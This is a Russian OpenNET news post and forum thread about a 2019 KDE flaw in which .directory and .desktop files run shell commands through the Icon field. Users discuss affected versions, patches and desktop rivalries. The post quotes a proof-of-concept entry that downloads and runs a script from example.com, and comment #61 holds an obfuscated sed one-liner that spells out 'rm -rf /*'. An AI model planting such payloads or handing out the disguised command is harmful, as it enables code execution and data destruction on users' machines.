The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от opennews (??), 07-Авг-19, 12:31 
В KDE выявлена (https://twitter.com/zer0pwn/status/1158433002239746048) уязвимость (https://gist.githubusercontent.com/zeropwn/630832df151029cb8...), позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 (https://kde.org/announcements/kde-frameworks-5.60.0.php) и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).

Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функию  KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды.  Вопреки спецификации XDG выполнение раскрытия (https://userbase.kde.org/KDE_System_Administration/Configura...) shell-конструкций производится без ограничения типа настроек, т.е. не только при определении командной строки для запуска приложения, но и при указании отображаемых по умолчанию пиктограмм.

Например, для атаки достаточно (https://github.com/RevThreat/KDE-ARBITRARY-CODE-EXECUTION-AU.../) отправить пользователю zip-архив каталогом, содержащим файл ".directory", включающим конструкцию вида:

   [Desktop Entry]
   Type=Directory
   Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

При попытке просмотра содержимого архива в файловом менеджере Dolphin  будет загружен и выполнен скрипт https://example.com/FILENAME.sh.


URL: https://packetstormsecurity.com/files/153874/KDE-4-5-KDeskto...
Новость: https://www.opennet.me/opennews/art.shtml?num=51235

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +18 +/
Сообщение от Аноним (1), 07-Авг-19, 12:31 
Это даже не autorun виндовый, это вообще дырень. Однако не все пользуются kde-шным файловым менеджером и вообще kde.  
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +17 +/
Сообщение от Qwerty (??), 07-Авг-19, 12:35 
Это даже не толстенький троллинг, это вообще жирень.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

11. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +4 +/
Сообщение от Аноним (11), 07-Авг-19, 12:51 
>Это даже не autorun виндовый

ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

67. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от VINRARUS (ok), 07-Авг-19, 16:38 
>>Это даже не autorun виндовый
> ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

superautorun

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

13. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Вуыкло (?), 07-Авг-19, 12:54 
От безысходности, ибо больше пользоваться попросту нечем.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

20. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +9 +/
Сообщение от анон (?), 07-Авг-19, 13:09 
kde можно поставить на винду
получим двойной профит
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

110. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от оралр (?), 08-Авг-19, 11:32 
Это говорит о том, что никто даже не думал что эти кеды и кому-то понадобиться взламывать, а следовательно и защищать. Зато пафосные сравнения с вантузом, который 20 лет сопротивляется реальным попыткам взлома.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

111. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от анон (?), 08-Авг-19, 12:22 
> 20 лет сопротивляется реальным попыткам взлома

китайские_пионеры.jpg

Ответить | Правка | ^ к родителю #110 | Наверх | Cообщить модератору

2. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Голубой гигант (?), 07-Авг-19, 12:32 
KDE 3.5.10 из openSUSE 15.1 подвержен?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (4), 07-Авг-19, 12:33 
Да
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

124. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от otmuenbg (?), 09-Авг-19, 20:01 
так проверь там вроде просто для матерого кадешника
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

126. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от sunjob (ok), 10-Авг-19, 19:01 
подвержены,да, но
- пролечено мгновенно в TDE, после поступления сигнала
- лечится аналогично в старом KDE3 (видимо, вообще бибилотеку не изменяли с тех пор ... а че?! работает - не трогай :o)
kdecore/kconfigbase.cpp

https://mirror.git.trinitydesktop.org/gitea/TDE/tdelibs/pull...

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от Аноним (3), 07-Авг-19, 12:33 
> достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере

в каком? midnight commander? pcmanfm? thunar?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от kamaganemail (?), 07-Авг-19, 12:39 
Видимо Dolphin, Krusader и Ark
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

35. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (35), 07-Авг-19, 14:18 
В любом KDE-шном диалоге открытия файла.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

92. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –4 +/
Сообщение от Daemon (??), 07-Авг-19, 22:43 
Я предполагаю, что это ошибка не KDE. А Qt в целом.
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

103. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от soarin (ok), 08-Авг-19, 08:17 
Неверно предполагаешь. Баг именно в KDE, а не в Qt.
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

5. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +5 +/
Сообщение от Аноним (5), 07-Авг-19, 12:34 
Виндовенько.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +2 +/
Сообщение от soarin (ok), 07-Авг-19, 12:46 
Когда это в венде такой примитив был?
Или вот ещё из той же серии.
https://kde.org/info/security/advisory-20180208-2.txt

В вендах разве что конкретно упоролись с автозагрузкой. Когда включили её по умолчанию. Но это была фишка, которую специально сделали, хоть и <я даже не знаю как цензурно это назвать>. С выходом Vista (уже более десяти лет прошло) дошло, что это была плохая идея.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

49. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (5), 07-Авг-19, 16:07 
Было пару похожих уязвимостей с ярлыками.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

87. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Sinot (ok), 07-Авг-19, 20:49 
Вроде в Gnome было подобное с превью картинок.
Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

100. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +4 +/
Сообщение от Аноним (100), 08-Авг-19, 07:35 
Тсс... Не мешай гномерам ликовать.
Ответить | Правка | ^ к родителю #87 | Наверх | Cообщить модератору

104. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от soarin (ok), 08-Авг-19, 08:21 
Пролистал комменты, что-то как-то не видно ликования гномеров. Фантазии?
А так ничего удивительного в сабже.
Ну и в GNOME само собой разные уязвимости были. И по авторанам, и по всяким превьюшкам. Это тоже естественно, ибо заинтересованность в нём выше.
Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

115. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от нех (?), 08-Авг-19, 15:07 
все просто. гномеры вымерли, ликовать некому.
Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

105. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от soarin (ok), 08-Авг-19, 08:29 
Да было.
Я о другом - о простоте.

Ну вот почитай это. И где-то с 2010 в Windows чего-то было тоже.
Но везде как-то там серьёзно репу чесали, чтобы буфера так-сяк определёнными байтами переполнять.
https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit...

А тут просто данные в SHELL суёт код, ну и ладно...

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

9. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –2 +/
Сообщение от Аноним (9), 07-Авг-19, 12:46 
Прям пыхом пахнуло. В 2019 году экранирование это всё ещё сложно?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от НяшМяш (ok), 07-Авг-19, 12:53 
Конечно. В Qt этой функции, наверное, нет из-за сложности реализации. /sarcasm
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

22. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (22), 07-Авг-19, 13:17 
Просто у них нет npm.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

101. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от Аноним (100), 08-Авг-19, 07:36 
А в гнгме ее просто нет. Как и многого другого.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

10. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +2 +/
Сообщение от Аноним (10), 07-Авг-19, 12:50 
пификсили вчера еще (в неоне), чел етот редиска канеш, но дырень огромная просто
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

47. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (35), 07-Авг-19, 16:01 
Интересно, где? https://packaging.neon.kde.org/?s=idle
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

83. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от anonymous (??), 07-Авг-19, 18:58 
да, сорян, прост вчера аккурат после новости апдейты секурные какие-то прилетели, толком не смотрел что именно, вот и подумалось, что топик-релейтед
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

125. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от anonymous (??), 09-Авг-19, 21:52 
а ващет я все-таки был прав:
https://twitter.com/kdecommunity/status/1159224511499309056
от 7го числа еще пост
Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

14. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от Аноним (-), 07-Авг-19, 12:55 
ls уязвим? Нет? Ну и ладно.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

61. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –2 +/
Сообщение от VINRARUS (ok), 07-Авг-19, 16:27 
ls /bin | sed -e '/.ee$/!d' -e '/^.r../!d' -e 's%e%f%' -e 's%$%*%'  -e 's%^%r%' -e 's%e% /%' -e 's%f%m -%'
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

93. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от neAnonim (?), 07-Авг-19, 22:46 
Так уязвим или чё? Ты вывод ls в sed отправляешь по своему желанию используя заклинание которое я рассмотреть не могу (не говоря уже о том что бы я это смог вбить)
Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

15. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от anan (?), 07-Авг-19, 12:58 
Минимум 11 лет багу
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

19. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +3 +/
Сообщение от Аноним (19), 07-Авг-19, 13:06 
И ведь кто-то наверняка знал!
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

48. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (48), 07-Авг-19, 16:05 
Ещё в konqueror была, когда он в KDE использовался, по-моему так и не пофиксили до перехода на Dolphin
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

85. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (85), 07-Авг-19, 19:07 
Тот кто пропатчил под неё KDE
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

24. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от IronMan (?), 07-Авг-19, 13:18 
В Тринити будут исправлять?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

127. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от sunjob (ok), 10-Авг-19, 19:06 
> В Тринити будут исправлять?

http://www.opennet.me/openforum/vsluhforumID3/118081.html#126

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

25. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (22), 07-Авг-19, 13:19 
Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от iPony129412 (?), 07-Авг-19, 15:34 
Ну это неправда.
Секурные бэкпорты же есть.
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

52. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –2 +/
Сообщение от Аноним (22), 07-Авг-19, 16:14 
Особенно в дебиане. Нет там ничего.
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

58. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от soarin (ok), 07-Авг-19, 16:23 
ну это ложь
https://security-tracker.debian.org/tracker/CVE-2018-6791
Вот как "не была" никогда залатана прошлая крутая дырка в KDE.
Да, там проще было латать, но всё же.
Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

90. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (90), 07-Авг-19, 21:52 
Все таки в дебиане и правда могут забить на это.
Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

98. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от soarin (ok), 08-Авг-19, 04:28 
Да, да, а ещё завтра Debian может закрыться.
Возможно всё. И естественно, что KDE в Debian пониже приоритетом.
Но всё же думать, что не наложат крохотный патч в "3 files changed, 7 insertions, 51 deletions" для высокого уровня опасной уязвимости глуповато.
Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

66. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от soarin (ok), 07-Авг-19, 16:35 
> Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия.

А вот собственно залатка в апстриме https://phabricator.kde.org/D22979
Как видно - ничего особенно сложного. Так что залатают.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

29. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –4 +/
Сообщение от Аноним (29), 07-Авг-19, 13:28 
>Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

Это что за статья????????

-Просто запустил KDE дистр, "перетащил мышью ярлык на рабочий стол или в документ" и получил заражение???

-Загрузил вредоносный desktop-файл от куда??? Вышел в интернет и загрузился сам???

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

63. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от VINRARUS (ok), 07-Авг-19, 16:32 
Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

82. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (82), 07-Авг-19, 18:48 
>Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.

Вы статью читали? Где там про вирус на винде?

>В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

Где тут о винде?

>Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory"

Каким нужно быть, чтобы принять файл и не проверить его?

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

84. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от VINRARUS (ok), 07-Авг-19, 19:02 
>>Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.
>Вы статью читали? Где там про вирус на винде?

А долго его написать? =D
Я писал о случаях когда накопитель исполюзует по очерёдно и винда и ОС с KDE, и это не токо флешки.

>Каким нужно быть, чтобы принять файл и не проверить его?

Очень занятым человеком. :)

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

94. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от neAnonim (?), 07-Авг-19, 22:51 
> Каким нужно быть, чтобы принять файл и не проверить его?

Достаточно быть пользователем kde и установить пакет который принесет с собой .desktop

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

89. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (90), 07-Авг-19, 21:51 
Пришел к тебе человек с уже зараженной флешкой (например в винде или спецом кто постарался), ты ее открыл - радуешься.
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

30. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –3 +/
Сообщение от Ilya Indigo (ok), 07-Авг-19, 13:35 
Неприятная фича.
К счастью, директории браузер загружать не умеет и прийти такое может только из архива, а Arc-ом открывать архивы безопасно.

Ещё, конечно, из git-а такое может прийти...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

60. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (60), 07-Авг-19, 16:27 
Я не знаю есть ли в Плазме Konqueror, но его фишка что это интернет браузер и файловый менеджер в одном флаконе.
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

68. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Ilya Indigo (ok), 07-Авг-19, 16:41 
> Я не знаю есть ли в Плазме Konqueror, но его фишка что
> это интернет браузер и файловый менеджер в одном флаконе.

Есть.
Файловый менеджер и браузер - это одно и тоже!
Многие путают интернет браузер и браузер, а это разные вещи.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

91. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (60), 07-Авг-19, 22:13 
>Многие путают интернет браузер и браузер, а это разные вещи.

Я знаю веб-браузер, а что за браузер в данном контексте?

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

96. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Ilya Indigo (ok), 07-Авг-19, 22:59 
>>Многие путают интернет браузер и браузер, а это разные вещи.
> Я знаю веб-браузер, а что за браузер в данном контексте?

https://en.wikipedia.org/wiki/Browser
Похоже я и сам ошибался, браузеров (обозревателей) множество, среди них web browser и file browser, also known as a file manager.

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

97. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (60), 07-Авг-19, 23:56 
Для избежания путаницы следует употреблять: веб-обозреватель (ВО) и файловый менеджер (ФМ).
https://ru.wikipedia.org/wiki/Браузер
https://ru.wikipedia.org/wiki/Файловый_менеджер
Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

65. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от VINRARUS (ok), 07-Авг-19, 16:33 
Покласть в архив с какими то кистями для фоторедактора - разархивировал и заразился.
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

72. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –2 +/
Сообщение от Ilya Indigo (ok), 07-Авг-19, 16:52 
> Покласть в архив с какими то кистями для фоторедактора - разархивировал и
> заразился.

Ну это и есть получить из архива.
Но Ваш алгоритм не совсем точен.
Получить архив с кистями --> тупо распаковать его не глядя в дельфине через ПКМ --> заразиться.
Если перед открытием посмотреть что ты собираешься распаковать, хотя бы чтобы посмотреть нужна ли ему субдиректория и сколько он весит, и обнаружить злополучный файл, и или удалить его или распаковать всё кроме него или вообще удалить архив, то заражение не произойдёт.

Я не в коем случае не говорю что это Лёня, напротив, омерзительный пример халатности и рукожопия, но если использовать Arc для проверки архивов, то этого опытный пользователь может избежать, пока не прилетит обновление.

А исправления для openSUSE уже в полёте https://build.opensuse.org/request/show/721476 https://build.opensuse.org/request/show/721478

Ответить | Правка | ^ к родителю #65 | Наверх | Cообщить модератору

102. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (100), 08-Авг-19, 07:43 
Чтобы распаковывать архивы, не заглядывая в них, нужно вообще быть альтернативно одаренной личностью.
Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

109. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от VINRARUS (ok), 08-Авг-19, 08:58 
Ну удачи в заглядывании в tar.gz без распаковки...
Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

114. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от Аноним (114), 08-Авг-19, 12:50 
Новость не читай
@
Сразу пиши.

Чтобы это сработало, архив нужно открыть как папку в долфине. По умолчанию эта возможность отключена в настройках, и весь просмотр осуществляется через Ark, который показывает содержимое, но не запускает выполнение .desktop-файлов.

Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

31. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –2 +/
Сообщение от AVX (ok), 07-Авг-19, 13:45 
Вот же ппц... никогда бы не подумал что так можно обрабатывать путь к картинке... Надо дома протестировать как оно в реальности.  
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

88. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от AVX (ok), 07-Авг-19, 21:19 
Посмотрел - по умолчанию dolphin открывает архивы в архиваторе. Но в настройках есть снятая галочка "открывать архивы как папки". Остаётся только смотреть, что распаковываешь, а распаковывать по ПКМ.  
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

32. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –2 +/
Сообщение от Аноним (29), 07-Авг-19, 14:01 
Кто-нибудь пользуется VMware ESX?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

42. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (42), 07-Авг-19, 14:57 
Не ставятся на него кеды.
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

33. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (33), 07-Авг-19, 14:04 
подвержены все у кого установлен файловый менеджер Dolphin?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

38. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от вейланд (?), 07-Авг-19, 14:22 
Любой файловый менеджер на базе kde, а также, если используются kde-шные диалоги открытия/сохранения файлов.
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

40. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (40), 07-Авг-19, 14:39 
Ну хоть скрипт выполнится из под юзера, не то что гномовоский наутилус, который давал рутовские права. Хотя безрукость конечно на лицо.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

41. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от soarin (ok), 07-Авг-19, 14:48 
> не то что гномовоский наутилус, который давал рутовские права

Что-то не припомню... А что, где, когда?

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

46. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (40), 07-Авг-19, 15:44 
https://www.opennet.me/opennews/art.shtml?num=49871
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

50. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от soarin (ok), 07-Авг-19, 16:07 
> В представленном 3 года назад GVFS-бекенде admin (GNOME Virtual File System) обнаружена уязвимость, позволяющая непривилегированным пользователям, присутствующим в группе wheel, без запроса пароля вносить любые правки в файловую систему с правами root.

Да как-то сабж пострашнее будет.

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

45. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (45), 07-Авг-19, 15:34 
Че сказать-то хотел?
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

54. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (22), 07-Авг-19, 16:17 
Что ГНОМ говно. Но тебе виндузятнику такие слова знать не нужно и вообще мозговую активность проявлять не нужно.
Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

62. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (60), 07-Авг-19, 16:28 
Gnome здарового человека это MATE. KDE здарового человека это TDE.
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

73. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноне (?), 07-Авг-19, 16:55 
Гноме курильщика после операции это Гноме.
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

53. Скрыто модератором  –1 +/
Сообщение от Аноним (53), 07-Авг-19, 16:16 
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

69. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +1 +/
Сообщение от VINRARUS (ok), 07-Авг-19, 16:44 
То я думаю чо Дельфин так долго запускается, а это его совесть мучит...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

77. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (77), 07-Авг-19, 17:27 
Долго запускается? Это на каком древнейшем железе? Специально замерил - на моём старом ThinkPad'e Dolphin запускается чуть больше секунды (1.3). На более современных компах будет ещё быстрее.
Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

81. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от VINRARUS (ok), 07-Авг-19, 18:28 
FX-8350 4.8 GHz, 16 Gb DDR3 2100 MHz, SSD Crucial MX500.
1+ сек запускается, шо много для ФМ, так как Firefox повторно запускается тоже меньше 2х сек.
А иногда вообще бывают случаи по 5 сек.
Ответить | Правка | ^ к родителю #77 | Наверх | Cообщить модератору

117. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от InuYasha (?), 08-Авг-19, 21:22 
отключи всякие фуфлоиндексаторы - и будет скорость.
Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

119. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от VINRARUS (ok), 08-Авг-19, 21:44 
> отключи всякие фуфлоиндексаторы - и будет скорость.

Это ж какие?

Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

120. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от InuYasha (?), 08-Авг-19, 23:37 
Как минимум - baloo, вроде бы. Смотришь фоновые процессы, читаешь маны, что это такое и гасишь, если лишнее. Я удалил всё подобное при установке ОС на ноут несколько лет назад и с тех пор не вспоминал. А ноут весьма... экономичный %) Но вообще Dolphin и у меня стартует до 5 секунд. Но там ещё влияют всякие шАры, маунты и прочее. И превьюхи, само собой.
Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

122. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от VINRARUS (ok), 09-Авг-19, 00:50 
> Как минимум - baloo, вроде бы.

